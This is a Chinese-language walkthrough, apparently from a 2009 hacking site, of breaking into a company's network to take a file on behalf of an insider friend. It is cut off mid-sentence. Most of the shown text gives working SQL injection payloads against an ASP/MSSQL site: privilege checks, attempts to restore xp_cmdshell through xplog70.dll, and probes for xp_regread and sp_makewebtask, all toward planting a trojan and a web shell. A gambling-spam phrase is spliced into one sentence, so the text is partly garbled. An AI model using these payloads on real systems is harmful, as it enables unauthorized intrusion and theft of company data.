入侵内网一般过程.docx

渗透国内某知名公司内部局域网经过 来源:未知 时间:2009-08-06 13:25 编辑:菇在江湖 本文的目标是一国内知名公司的网络，本文图片、文字都经过处理，均为伪造，如有雷同， 纯属巧合。 最近一个网友要我帮他拿他们公司内网一项重要的文件，公司网络信息朋友都 mail 给我了， 这些信息主要是几张网络拓扑图以及在内网嗅探到的信息（包括朋友所在的子网的设备用 户名及密码等信息……）。参照以上信息总体整理了一下入侵的思路，如果在朋友机器安 装木马，从内部连接我得到一个 CMD Shell，须要精心伪装一些信息还有可能给朋友带来 麻烦，所以选择在该网络的网站为突破口，而且管理员不会认为有“内鬼”的存在。 用代理上肉鸡，整体扫描了一下他的网站，只开了 80 端口，没扫描出来什么有用的信息， 就算有也被外层设备把信息过滤掉了，网站很大整体是静态的网页，有哪些信誉好的足球投注网站一下，查看源文 件-查找-.asp。很快找到一个类似 http://www.*****.com/news/show1.asp?NewsId=125272 页面，在后面加上 and 1=1 、and 1=2 前者正常，后者反回如下错误。 Microsoft OLE DB Provider for ODBC Driver error 80040e14 [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character sting”. /news/show/show1.asp，行 59 是 IIS+MSSQL+ASP 的站，在来提交： http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select is_srvrolemember(sysadmin)) http://www.*****.com/news/show1.asp?NewsId=125272 and sa=(select system_user) 结果全部正常，正常是说明是当前连接的账号是以最高权限的 SA 运行的，看一下经典的 “sp_cmdshell”扩展存储是否存在，如果存在那就是初战告捷。 http://www.*****.com/news/show1.asp?NewsId=125272 and 1=(select count(*) from master.dbo.sysobjects where xtype = ‘x’ and name = xp_cmdshell) 失败，看看是否可以利用 xplog70.dll 恢复，在提交： http://www.*****.com/news/show1.asp?NewsId=125272;exec master.dbo.sp_addextendedproc xp_cmdshell,’xplog70.dll ’ 在试一下 xp_cmdshell 是否恢复了，又失败了，看样管理是把 xp_cmdshell 和 xplog70.dll 删除了，想利用 xp_cmdshell“下载”我们的木马现在是不可能的。首先我们先要得到一个 WEB Shell，上传 xplog70.dll，恢复 xp_cmdshell 在利用 xp_cmdshell 运行我们上传的木马， 这都是大众入侵思路了，前辈们以经无数人用这个方法入侵成功。拿出 NBSI 扫一下，一 会后台用户名和密码是出来了，可是后台登录地址扫不出来，测试了 N 个工具、手工测试 也没结果，有可能管理员把后台删除了。我们想办法得到网站的目录，这时就须要用到 xp_regread、sp_makewebtask 两个扩展存储，试一下是否存在： http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*) from master.dbo.sysobjects where name = xp_regread) http://www.*****.com/news/show1.asp?NewsId=125272and 1=(select count(*) from master.dbo.sysobjects where xtype=X and name = sp_makewebtask) 全部返回正常说明存在(一般的网管不太了解他们，存在也很正常)，首先简单介绍一下 xp_regread 扩展存储过程及 sp_makewebtask Web 助手存储过程，xp_regread 是用来读 取注册表信息的，我们可以通过这个来得到保存在注册表中的